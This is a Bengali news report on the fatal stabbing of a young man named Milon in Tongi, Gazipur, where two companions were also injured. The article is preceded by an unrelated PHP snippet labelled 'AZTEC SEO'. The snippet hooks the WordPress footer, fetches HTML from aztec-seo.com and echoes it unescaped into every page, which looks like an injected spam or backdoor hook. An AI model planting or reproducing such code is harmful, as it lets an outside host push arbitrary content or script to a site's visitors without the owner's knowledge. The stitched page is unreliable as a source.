/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99);
গাজীপুরের টঙ্গীতে এক যুবককে এলোপাতাড়ি কুপিয়ে হত্যা করেছে দুর্বৃত্তরা। নিহতের নাম মিলন (৩০)। সে কুড়িগ্রাম জেলার রাজারহাট উপজেলার বালাকান্দি গ্রামের আব্দুল মালেকের ছেলে।
এ ঘটনায় প্রিন্স (২২) ও টিটু (২৫) নামে দুই যুবক আহত হয়েছেন। মঙ্গলবার রাত সাড়ে ১০টার দিকে ফকির মার্কেট আলেরটেক এলাকায় এ ঘটনা ঘটে।
প্রত্যক্ষদর্শীরা জানান, মঙ্গলবার রাতে আলেরটেক মিঠু খন্দকারের ডিশ অফিসের সামনে আড্ডা দিচ্ছিলেন মিলন, প্রিন্স ও টিটুসহ কয়েকজন। এসময় ১৫ থেকে ২০ জন দুর্বৃত্ত মুখে মাস্ক পড়ে এসে মিলন ও তার সহযোগীদের ধারালো অস্ত্র দিয়ে এলোপাতাড়ি কুপিয়ে জখম করে ফেলে যায়।
স্থানীয়রা গুরুতর আহত অবস্থায় তাদের উদ্ধার করে শহীদ আহসান উল্লাহ মাস্টার জেনারেল হাসপাতালে নিয়ে গেলে চিকিৎসক মিলনকে মৃত ঘোষণা করেন। আহত প্রিন্সের অবস্থা আশঙ্কাজনক হওয়ায় তাকে ঢাকা মেডিকেল কলেজ হাসপাতালে পাঠানো হয়েছে।
টঙ্গী পূর্ব থানার ওসি মো. আমিনুল ইসলাম জানান, কি কারণে হত্যাকাণ্ড ঘটেছে এখনও জানা যায়নি। তদন্তপূর্বক দোষীদের বিরুদ্ধে দ্রুত ব্যবস্থা নেওয়া হবে।
ঢাকা স্কাইনিউজ/শেখ দৌলত আহমাদ